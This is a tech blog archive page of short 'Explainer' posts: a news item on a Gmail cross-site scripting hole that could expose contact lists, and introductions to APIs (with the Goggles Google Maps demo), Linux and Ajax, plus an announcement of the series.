Slashdot is reporting that a hole in Gmail could potentially allow nasty people to view your entire Gmail contact list remotely. This type of vulnerability is commonly called Cross-Site Scripting or XSS.

All you have to do is have Gmail open, and browse to a website with some malicious JavaScript. The loophole in Google’s code means that this website can siphon off all your contact information.

This attack appears not to be very widespread at the moment, and I have no doubt that Google will be fixing it very quickly - especially now that it’s made the headlines.

This seems a perfect opportunity to explain XSS - some of the ways it can happen and how much of a problem it poses.

(more…)

This post is another Explainer post, and it’s about APIs and what they can do. Through a couple of examples, by the end of this post you should know what APIs are and how they are useful and why they are popping up in so many Web 2.0 applications.
I found this site a while back and it’s a really cool demonstration of what the power of Google Maps can do.

It’s called Goggles, and it’s essentially a Flash-powered ‘flight simulator’ where you can fly over real images of the world and explore Google Maps with a little bit more finesse.

(Linux users - it requires Flash 8, which isn’t on Linux, but I found a workaround if you want to try this and other Flash 8 stuff out).

It’s an impressive demonstration of what the Google Maps API can do and it’s certainly an interesting project. A lot of sites and web services have made use of the Google Maps API; for example, Frappr uses it for all the maps, but this is the most inventive and most complex use of the API I have seen yet.

Google opened the API up so that site developers could do this sort of thing with Google’s data and a lot of Web 2.0 services also have (slightly less impressive) APIs, for example, Youtube has one so that you can include some of their video services on your site.

So what exactly is an API? Find out after the jump.
(more…)

First things first, this is another post in the Explainer series. So, if you know what Linux and free/open source software are and/or don’t need refreshing, then you can just skip straight over this post.

If you don’t know what Linux is, or have only vaguely heard of it, this post is designed to give you a brief introduction into what Linux is, what the ideas behind it are, and how to give it a try (without wiping over anything on your computer).

(more…)

This is the first in my series of explainer posts. Ajax is the talk of the Web 2.0 world at the moment; it’s seen by many as the ‘must have’ feature of any web service, and is described by others as an over-hyped, over-used technology. But what is it? Well, it stands for Asynchrous Javascript and XML, and is essentially a way in which a website can update what you see on it without you having to refresh the page. That makes it perfect for rich web applications - websites which are aiming to act as much like traditional desktop applications as possible.

A great example of the use of Ajax, compared to traditional techniques would be Gmail and Hotmail. Gmail makes great use of Ajax, meaning that if someone sends you an email while you are looking at your inbox, it appears in your inbox without you refreshing the page. Or if you archive a message, it disappears from your inbox without refreshing. This allows you to work much faster, because you don’t have to wait after every action, as you did in earlier webmail services, like Hotmail. In Hotmail, every time you change a view you have to refresh the page. The next version of Hotmail (currently in beta version) is Windows Live Mail, and that uses lots of Ajax to create an experience as much like a conventional program such as Outlook as possible. Ajax is important because it is one of the major fuels of Web 2.0. Without Ajax, no-one would use services like Writely, because it would be so inefficient, and the experience so inferior to using a program such as Microsoft Word.

For further specific information about how Ajax works, see Wikipedia. For examples of Ajax websites, just read Techcrunch, or have a look at this use of Ajax to power a remote desktop.

I sometimes feel when I’m writing posts for Gizbuzz that I have to stop what I’m writing and explain it, just in case there are some readers who don’t fully understand what’s going on. I don’t really want to have to do this as it can sometimes get in the way, so over the coming weeks I’ll write some explainer posts of various concepts (eg AJAX) which hopefully will be interesting in themselves for some readers, and then then they can be linked to from any posts which are talking about related uses of these technologies. So if you already know what things like AJAX are (which I imagine most of you do) then just glaze over. Otherwise, happy reading!